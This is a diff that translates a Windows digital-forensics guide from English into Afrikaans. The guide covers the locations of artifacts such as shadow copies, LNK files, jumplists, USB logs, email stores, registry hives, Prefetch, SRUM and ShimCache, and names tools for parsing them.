``` .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` - ![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>) ### Volume Shadow Copies -Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. +Shadow Copy is 'n tegnologie wat ingesluit is in Microsoft Windows wat **back-up kopieë** of afskrifte van rekenaar lêers of volumes kan skep, selfs wanneer hulle in gebruik is. -These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image: +Hierdie rugsteun kopieë is gewoonlik geleë in die `\System Volume Information` vanaf die wortel van die lêersisteem en die naam bestaan uit **UIDs** soos getoon in die volgende prentjie: ![](<../../../.gitbook/assets/image (520).png>) -Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. +Deur die forensiese beeld te monteer met die **ArsenalImageMounter**, kan die instrument [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) gebruik word om 'n skadukopie te ondersoek en selfs die lêers uit die skadukopie-rugsteunkopieë te **onttrek**. ![](<../../../.gitbook/assets/image (521).png>) -The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: +Die registerinskrywing `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` bevat die lêers en sleutels **wat nie rugsteunkopieë moet wees nie**: ![](<../../../.gitbook/assets/image (522).png>) -The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. 
+Die register `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` bevat ook konfigurasie-inligting oor die `Volume Shadow Copies`. -### Office AutoSaved Files +### Office AutoSaved-lêers -You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Jy kan die kantoor outomatiese gestoorde lêers vind in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` ## Shell Items -A shell item is an item that contains information about how to access another file. +'n Skulpunt is 'n item wat inligting bevat oor hoe om toegang tot 'n ander lêer te verkry. -### Recent Documents (LNK) +### Onlangse Dokumente (LNK) -Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: +Windows skep **outomaties** hierdie **kortpaaie** wanneer die gebruiker 'n lêer **open, gebruik of skep** in: * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created. +Wanneer 'n vouer geskep word, word 'n skakel na die vouer, na die ouervouer en die ouergrootouervouer ook geskep. -These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed. +Hierdie outomaties geskepte skakel lêers **bevat inligting oor die oorsprong** soos of dit 'n **lêer** **of** 'n **vouer** is, **MAC** **tye** van daardie lêer, **volume-inligting** van waar die lêer gestoor word en die **vouer van die teikenvouer**. Hierdie inligting kan nuttig wees om daardie lêers te herstel in die geval dat hulle verwyder is. 
-Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. +Verder is die **skepdatum van die skakel** lêer die eerste **keer** wat die oorspronklike lêer **eerste** **gebruik** is en die **gewysigde datum** van die skakel lêer is die **laaste** **keer** wat die oorspronklike lêer gebruik is. -To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). +Om hierdie lêers te ondersoek, kan jy die instrument [**LinkParser**](http://4discovery.com/our-tools/) gebruik. -In this tools you will find **2 sets** of timestamps: +In hierdie instrument sal jy **2 stelle** tydmerke vind: -* **First Set:** - 1. FileModifiedDate - 2. FileAccessDate - 3. FileCreationDate -* **Second Set:** - 1. LinkModifiedDate - 2. LinkAccessDate - 3. LinkCreationDate. +* **Eerste Stel:** +1. FileModifiedDate +2. FileAccessDate +3. FileCreationDate +* **Tweede Stel:** +1. LinkModifiedDate +2. LinkAccessDate +3. LinkCreationDate. -The first set of timestamp references the **timestamps of the file itself**. The second set references the **timestamps of the linked file**. - -You can get the same information running the Windows CLI tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) +Die eerste stel tydmerke verwys na die **tydmerke van die lêer self**. Die tweede stel verwys na die **tydmerke van die gekoppelde lêer**. +Jy kan dieselfde inligting kry deur die Windows CLI-instrument [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) uit te voer. ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` +In hierdie geval sal die inligting binne 'n CSV-lêer gestoor word. -In this case, the information is going to be saved inside a CSV file. +### Springlyste -### Jumplists +Dit is die onlangse lêers wat per toepassing aangedui word. 
Dit is die lys van onlangse lêers wat deur 'n toepassing gebruik word en waartoe jy toegang kan verkry op elke toepassing. Hulle kan outomaties geskep word of aangepas wees. -These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. They can be created **automatically or be custom**. +Die outomaties geskepte springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Die springlyste word genoem volgens die formaat `{id}.autmaticDestinations-ms` waar die aanvanklike ID die ID van die toepassing is. -The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application. +Die aangepaste springlyste word gestoor in `C:\Users\{gebruikersnaam}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` en hulle word gewoonlik deur die toepassing geskep omdat iets belangrik met die lêer gebeur het (dalk as gunsteling gemerk). -The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file (maybe marked as favorite) +Die **geskepte tyd** van enige springlys dui die **eerste keer aan dat die lêer geopen is** en die **veranderde tyd die laaste keer**. -The **created time** of any jumplist indicates the **the first time the file was accessed** and the **modified time the last time**. - -You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). +Jy kan die springlyste ondersoek met behulp van [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). 
![](<../../../.gitbook/assets/image (474).png>) -(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_) +(_Let daarop dat die tye wat deur JumplistExplorer verskaf word, verband hou met die springlys-lêer self_) ### Shellbags -[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) +[**Volg hierdie skakel om uit te vind wat die shellbags is.**](interesting-windows-registry-keys.md#shellbags) -## Use of Windows USBs +## Gebruik van Windows USB's -It's possible to identify that a USB device was used thanks to the creation of: +Dit is moontlik om te identifiseer dat 'n USB-toestel gebruik is as gevolg van die skepping van: -* Windows Recent Folder -* Microsoft Office Recent Folder -* Jumplists +* Windows Onlangse Gids +* Microsoft Office Onlangse Gids +* Springlyste -Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: +Let daarop dat sommige LNK-lêers in plaas van na die oorspronklike pad te verwys, na die WPDNSE-gids verwys: ![](<../../../.gitbook/assets/image (476).png>) -The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. +Die lêers in die WPDNSE-gids is 'n kopie van die oorspronklike lêers en sal dus nie oorleef na 'n herlaai van die rekenaar nie, en die GUID word geneem uit 'n shellbag. -### Registry Information +### Registerinligting -[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contain interesting information about USB connected devices. +[Kyk na hierdie bladsy om uit te vind](interesting-windows-registry-keys.md#usb-information) watter registerkodes interessante inligting oor USB-aangeslote toestelle bevat. ### setupapi -Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). 
+Kyk na die lêer `C:\Windows\inf\setupapi.dev.log` om die tye te kry wanneer die USB-aansluiting plaasgevind het (soek na `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB Detective -[**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image. +[**USBDetective**](https://usbdetective.com) kan gebruik word om inligting te verkry oor die USB-toestelle wat aan 'n beeld gekoppel was. ![](<../../../.gitbook/assets/image (483).png>) -### Plug and Play Cleanup +### Inprop en Speel Skoonmaak -The scheduled task known as 'Plug and Play Cleanup' is primarily designed for the removal of outdated driver versions. Contrary to its specified purpose of retaining the latest driver package version, online sources suggest it also targets drivers that have been inactive for 30 days. Consequently, drivers for removable devices not connected in the past 30 days may be subject to deletion. +Die geskeduleerde taak wat bekend staan as 'Inprop en Speel Skoonmaak' is primêr ontwerp vir die verwydering van verouderde bestuurdersweergawes. In teenstelling met sy gespesifiseerde doelwit om die nuutste bestuurderspakketweergawe te behou, dui aanlynbronne daarop dat dit ook mik op bestuurders wat vir 30 dae onaktief was. Gevolglik kan bestuurders vir verwyderbare toestelle wat nie in die afgelope 30 dae aangesluit is nie, onderhewig wees aan uitwissing. 
-The task is located at the following path: +Die taak is geleë by die volgende pad: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. -A screenshot depicting the task's content is provided: +'n Skermkiekie wat die inhoud van die taak uitbeeld, word voorsien: ![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) -**Key Components and Settings of the Task:** -- **pnpclean.dll**: This DLL is responsible for the actual cleanup process. -- **UseUnifiedSchedulingEngine**: Set to `TRUE`, indicating the use of the generic task scheduling engine. +**Kernkomponente en instellings van die taak:** +- **pnpclean.dll**: Hierdie DLL is verantwoordelik vir die werklike skoonmaakproses. +- **UseUnifiedSchedulingEngine**: Gestel op `TRUE`, wat dui op die gebruik van die generiese taakbeplanning-enjin. - **MaintenanceSettings**: - - **Period ('P1M')**: Directs the Task Scheduler to initiate the cleanup task monthly during regular Automatic maintenance. - - **Deadline ('P2M')**: Instructs the Task Scheduler, if the task fails for two consecutive months, to execute the task during emergency Automatic maintenance. +- **Period ('P1M')**: Stuur die Taakbeplanner om die skoonmaaktaak maandeliks tydens gereelde outomatiese instandhouding te begin. +- **Deadline ('P2M')**: Instrueer die Taakbeplanner, as die taak vir twee opeenvolgende maande misluk, om die taak tydens noodgevalle outomatiese instandhouding uit te voer. -This configuration ensures regular maintenance and cleanup of drivers, with provisions for reattempting the task in case of consecutive failures. +Hierdie konfigurasie verseker gereelde instandhouding en skoonmaak van bestuurders, met voorsiening vir herpoging van die taak in geval van opeenvolgende mislukkings. 
-**For more information check:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**Vir meer inligting, kyk na:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) -## Emails +## E-posse -Emails contain **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like: +E-posse bevat **2 interessante dele: Die koppe en die inhoud** van die e-pos. In die **koppe** kan jy inligting soos vind: -* **Who** sent the emails (email address, IP, mail servers that have redirected the email) -* **When** was the email sent +* **Wie** het die e-posse gestuur (e-posadres, IP, posbedieners wat die e-pos omgelei het) +* **Wanneer** is die e-posse gestuur -Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: +Binne die `References` en `In-Reply-To` koppe kan jy ook die ID van die boodskappe vind: ![](<../../../.gitbook/assets/image (484).png>) -### Windows Mail App +### Windows-pos-app -This application saves emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with the `.dat` extension. +Hierdie toepassing stoor e-posse in HTML- of teksformaat. Jy kan die e-posse binne subgidsies binne `\Users\\AppData\Local\Comms\Unistore\data\3\` vind. Die e-posse word met die `.dat`-uitbreiding gestoor. 
-The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` +Die **metadata** van die e-posse en die **kontakte** kan binne die **EDB-databasis** gevind word: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` -**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) to open it. Inside the `Message` table you can see the emails. +**Verander die uitbreiding** van die lêer van `.vol` na `.edb` en jy kan die instrument [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) gebruik om dit oop te maak. Binne die `Message`-tabel kan jy die e-posse sien. ### Microsoft Outlook -When Exchange servers or Outlook clients are used there are going to be some MAPI headers: +Wanneer Exchange-bedieners of Outlook-kliënte gebruik word, sal daar sekere MAPI-koppe wees: -* `Mapi-Client-Submit-Time`: Time of the system when the email was sent -* `Mapi-Conversation-Index`: Number of children messages of the thread and timestamp of each message of the thread -* `Mapi-Entry-ID`: Message identifier. -* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client (message read? no read? responded? redirected? out of the office?) +* `Mapi-Client-Submit-Time`: Tyd van die stelsel toe die e-pos gestuur is +* `Mapi-Conversation-Index`: Aantal kinderboodskappe van die draad en tydstempel van elke boodskap van die draad +* `Mapi-Entry-ID`: Boodskapidentifiseerder. +* `Mappi-Message-Flags` en `Pr_last_Verb-Executed`: Inligting oor die MAPI-kliënt (boodskap gelees? nie gelees nie? geantwoord? omgelei? uit die kantoor?) 
-In the Microsoft Outlook client, all the sent/received messages, contacts data, and calendar data are stored in a PST file in: +In die Microsoft Outlook-kliënt word al die gestuur/ontvang boodskappe, kontakte-inligting en kalenderinligting gestoor in 'n PST-lêer in: * `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP) * `%USERPROFILE%\AppData\Local\Microsoft\Outlook` -The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` indicates the file that is being used. +Die registerpad `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` dui die lêer aan wat gebruik word. -You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). +Jy kan die PST-lêer oopmaak met die instrument [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). ![](<../../../.gitbook/assets/image (485).png>) +### Microsoft Outlook OST-lêers -### Microsoft Outlook OST Files +'n **OST-lêer** word gegenereer deur Microsoft Outlook wanneer dit gekonfigureer is met 'n **IMAP** of 'n **Exchange**-bediener, wat soortgelyke inligting as 'n PST-lêer stoor. Hierdie lêer word gesinkroniseer met die bediener en behou data vir **die laaste 12 maande** tot 'n **maksimum grootte van 50GB**, en dit is geleë in dieselfde gids as die PST-lêer. Om 'n OST-lêer te sien, kan die [**Kernel OST-kieker**](https://www.nucleustechnologies.com/ost-viewer.html) gebruik word. -An **OST file** is generated by Microsoft Outlook when it's configured with **IMAP** or an **Exchange** server, storing similar information to a PST file. This file is synchronized with the server, retaining data for **the last 12 months** up to a **maximum size of 50GB**, and is located in the same directory as the PST file. 
To view an OST file, the [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) can be utilized. +### Terugwinning van Aanhegsels -### Retrieving Attachments +Verlore aanhegsels kan herwin word vanaf: -Lost attachments might be recoverable from: +- Vir **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` +- Vir **IE11 en hoër**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -- For **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -- For **IE11 and above**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` +### Thunderbird MBOX-lêers -### Thunderbird MBOX Files +**Thunderbird** maak gebruik van **MBOX-lêers** om data te stoor, geleë by `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. -**Thunderbird** utilizes **MBOX files** to store data, located at `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. +### Beeld Duimnaels -### Image Thumbnails +- **Windows XP en 8-8.1**: Toegang tot 'n gids met duimnaels skep 'n `thumbs.db`-lêer wat beeldvoorbeelde stoor, selfs na uitvee. +- **Windows 7/10**: `thumbs.db` word geskep wanneer dit oor 'n netwerk via 'n UNC-paad benader word. +- **Windows Vista en nuwer**: Duimnaelvoorbeelde word gekentraliseer in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` met lêers genaamd **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) en [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) is hulpmiddels vir die sien van hierdie lêers. -- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion. -- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path. -- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache\_xxx.db**. 
[**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files. +### Windows Registerinligting -### Windows Registry Information +Die Windows-register, wat omvattende stelsel- en gebruikersaktiwiteitsdata stoor, word bevat binne lêers in: -The Windows Registry, storing extensive system and user activity data, is contained within files in: +- `%windir%\System32\Config` vir verskeie `HKEY_LOCAL_MACHINE` subleutels. +- `%UserProfile%{User}\NTUSER.DAT` vir `HKEY_CURRENT_USER`. +- Windows Vista en nuwer weergawe maak rugsteun van `HKEY_LOCAL_MACHINE` registerlêers in `%Windir%\System32\Config\RegBack\`. +- Daarbenewens word programuitvoeringsinligting gestoor in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` vanaf Windows Vista en Windows 2008 Server voortgaan. -- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys. -- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`. -- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`. -- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards. +### Hulpmiddels -### Tools +Sommige hulpmiddels is nuttig vir die analise van die registerlêers: -Some tools are useful to analyze the registry files: +* **Registerredakteur**: Dit is geïnstalleer in Windows. Dit is 'n GUI om deur die Windows-register van die huidige sessie te blaai. +* [**Registerverkenner**](https://ericzimmerman.github.io/#!index.md): Dit stel jou in staat om die registerlêer te laai en daardeur te blaai met 'n GUI. Dit bevat ook Bladmerke wat sleutels met interessante inligting uitlig. 
+* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Weereens, dit het 'n GUI wat toelaat om deur die gelaai register te blaai en bevat ook plugins wat interessante inligting binne die gelaai register uitlig. +* [**Windows Registerherwinning**](https://www.mitec.cz/wrr.html): 'n Ander GUI-toepassing wat in staat is om die belangrike inligting uit die gelaai register te onttrek. -* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session. -* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information. -* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry. -* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded. +### Herstel van Verwyderde Element -### Recovering Deleted Element +Wanneer 'n sleutel verwyder word, word dit as sodanig gemerk, maar dit sal nie verwyder word totdat die spasie wat dit beset word benodig nie. Daarom is dit moontlik om hierdie verwyderde sleutels te herstel deur gebruik te maak van hulpmiddels soos **Registerverkenner**. -When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys. +### Laaste Skryftyd -### Last Write Time - -Each Key-Value contains a **timestamp** indicating the last time it was modified. +Elke Sleutel-Waarde bevat 'n **tydstempel** wat aandui wanneer dit laas gewysig is. ### SAM -The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system. 
+Die lêer/hive **SAM** bevat die **gebruikers, groepe en gebruikerswagwoorde**-hasings van die stelsel. -In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**. +In `SAM\Domains\Account\Users` kan jy die gebruikersnaam, die RID, laaste aanmelding, laaste mislukte aanmelding, aanmeldingteller, wagwoordbeleid en wanneer die rekening geskep is, verkry. Om die **hasings** te kry, het jy ook die lêer/hive **SYSTEM** **nodig**. -### Interesting entries in the Windows Registry +### Interessante inskrywings in die Windows-register {% content-ref url="interesting-windows-registry-keys.md" %} [interesting-windows-registry-keys.md](interesting-windows-registry-keys.md) {% endcontent-ref %} -## Programs Executed +## Uitgevoerde Programme -### Basic Windows Processes +### Basiese Windows-prosesse -In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours. +In [hierdie berig](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) kan jy leer oor die algemene Windows-prosesse om verdagte gedrag te identifiseer. -### Windows Recent APPs +### Windows Onlangse Programme -Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched. +Binne die register `NTUSER.DAT` in die pad `Software\Microsoft\Current Version\Search\RecentApps` kan jy subleutels kry met inligting oor die **uitgevoerde toepassing**, **laaste keer** wat dit uitgevoer is, en **aantal kere** wat dit geloods is. 
### BAM (Background Activity Moderator) -You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry). +Jy kan die `SYSTEM`-lêer oopmaak met 'n registerredakteur en binne die pad `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` kan jy die inligting oor die **toepassings wat deur elke gebruiker uitgevoer is** vind (merk die `{SID}` in die pad) en **watter tyd** hulle uitgevoer is (die tyd is binne die Data-waarde van die register). ### Windows Prefetch -Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker. +Prefetching is 'n tegniek wat 'n rekenaar in staat stel om stilweg die nodige hulpbronne op te haal wat nodig is om inhoud te vertoon wat 'n gebruiker **moontlik binnekort sal toegang** sodat hulpbronne vinniger toeganklik kan wees. -Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10. +Windows prefetch bestaan uit die skep van **kasgeheues van die uitgevoerde programme** om hulle vinniger te kan laai. Hierdie kasgeheues word geskep as `.pf`-lêers binne die pad: `C:\Windows\Prefetch`. Daar is 'n limiet van 128 lêers in XP/VISTA/WIN7 en 1024 lêers in Win8/Win10. -The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point. 
+Die lêernaam word geskep as `{program_naam}-{hash}.pf` (die hash is gebaseer op die pad en argumente van die uitvoerbare lêer). In W10 is hierdie lêers saamgedruk. Let daarop dat die blootwesigheid van die lêer aandui dat **die program op 'n stadium uitgevoer is**. -The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. - -To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): +Die lêer `C:\Windows\Prefetch\Layout.ini` bevat die **name van die gids van die lêers wat geprefetch word**. Hierdie lêer bevat **inligting oor die aantal uitvoerings**, **datums** van die uitvoering en **lêers** **wat oop** is deur die program. +Om hierdie lêers te ondersoek, kan jy die hulpmiddel [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd) gebruik: ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` - ![](<../../../.gitbook/assets/image (487).png>) ### Superprefetch -**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\ -This service will generate database files in `C:\Windows\Prefetch\Ag*.db`. +**Superprefetch** het dieselfde doel as prefetch, **laai programme vinniger** deur te voorspel wat die volgende gelaaide item sal wees. Dit vervang egter nie die prefetch-diens nie.\ +Hierdie diens sal databasislêers genereer in `C:\Windows\Prefetch\Ag*.db`. -In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**. 
+In hierdie databasisse kan jy die **naam** van die **program**, **aantal** **uitvoerings**, **geopen** **lêers**, **toegang tot** **volume**, **volledige** **pad**, **tydperke** en **tydstempels** vind. -You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). +Jy kan hierdie inligting kry deur die hulpmiddel [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) te gebruik. ### SRUM -**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`. +**System Resource Usage Monitor** (SRUM) **monitor** die **hulpbronne** **verbruik** **deur 'n proses**. Dit het in W8 verskyn en stoor die data in 'n ESE-databasis wat in `C:\Windows\System32\sru\SRUDB.dat` geleë is. -It gives the following information: +Dit gee die volgende inligting: -* AppID and Path -* User that executed the process -* Sent Bytes -* Received Bytes -* Network Interface -* Connection duration -* Process duration +* AppID en Pad +* Gebruiker wat die proses uitgevoer het +* Gestuurde bytes +* Ontvangsbytes +* Netwerkinterface +* Verbindingsduur +* Prosesduur -This information is updated every 60 mins. - -You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump). +Hierdie inligting word elke 60 minute opgedateer. +Jy kan die datum uit hierdie lêer kry deur die hulpmiddel [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) te gebruik. ```bash .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum ``` - ### AppCompatCache (ShimCache) -The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. 
This system component records various pieces of file metadata, which include: +Die **AppCompatCache**, ook bekend as **ShimCache**, vorm deel van die **Application Compatibility Database** wat deur **Microsoft** ontwikkel is om programverenigbaarheidsprobleme aan te spreek. Hierdie stelselkomponent neem verskeie stukke lêermetadata op, wat insluit: -- Full path of the file -- Size of the file -- Last Modified time under **$Standard\_Information** (SI) -- Last Updated time of the ShimCache -- Process Execution Flag +- Volledige pad van die lêer +- Grootte van die lêer +- Laaste gewysigde tyd onder **$Standard\_Information** (SI) +- Laaste opgedateerde tyd van die ShimCache +- Prosesuitvoeringsvlag -Such data is stored within the registry at specific locations based on the version of the operating system: +Sodanige data word binne die register gestoor op spesifieke plekke gebaseer op die weergawe van die bedryfstelsel: -- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. -- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively. +- Vir XP word die data gestoor onder `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` met 'n kapasiteit vir 96 inskrywings. +- Vir Server 2003, sowel as vir Windows-weergawes 2008, 2012, 2016, 7, 8 en 10, is die bergpad `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, wat onderskeidelik 512 en 1024 inskrywings akkommodeer. -To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use. 
